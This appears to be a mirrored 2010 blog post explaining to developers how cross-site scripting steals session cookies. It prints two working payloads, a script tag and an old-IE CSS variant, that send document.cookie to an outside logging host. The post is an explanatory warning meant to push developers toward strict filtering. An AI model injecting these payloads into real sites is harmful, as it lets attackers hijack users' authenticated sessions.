This is a mirror of official site: http://jasper-net.blogspot.com/

XSS – Stealing Cookies 101

| Sunday, May 16, 2010
Stealing cookies is easy. Never trust a client to be who you think it is. Just because it was trusted a few seconds ago doesn't mean it will be in a few seconds, ESPECIALLY if a cookie is all you use to identify a client.

A recent LiveJournal hack has brought this to light again. Back when MySpace was hacked in October, it reminded us that we must be vigilant in filtering the text users post, because an attacker can smuggle in JavaScript that misuses the site from the browsers of authenticated users.

By stealing a user's cookies, as the LiveJournal hack did, you don't even have to carry out the attack in the user's browser; you can do it from anywhere. Worst of all, stealing cookies is EASY TO DO and HARD TO PROTECT AGAINST.

Easy to do?

<script>
new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);
</script>

That's it. If I can get that code onto a site where you are authenticated, I can become you: the image request never renders anything, but its URL carries your cookies to my server.
In older versions of Internet Explorer there is another route that needs no <script> tag at all: execute the JavaScript from CSS, since those versions of IE evaluated a javascript: URL inside url().


<style>
.getcookies{background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);');}
</style>
<p class="getcookies"></p>

Any time you let users post text and you don't religiously restrict the content, they can steal sessions. Scary? If you are a developer it had better scare the hell out of you.

Read more: Jehiah

Posted via email from jasper22's posterous
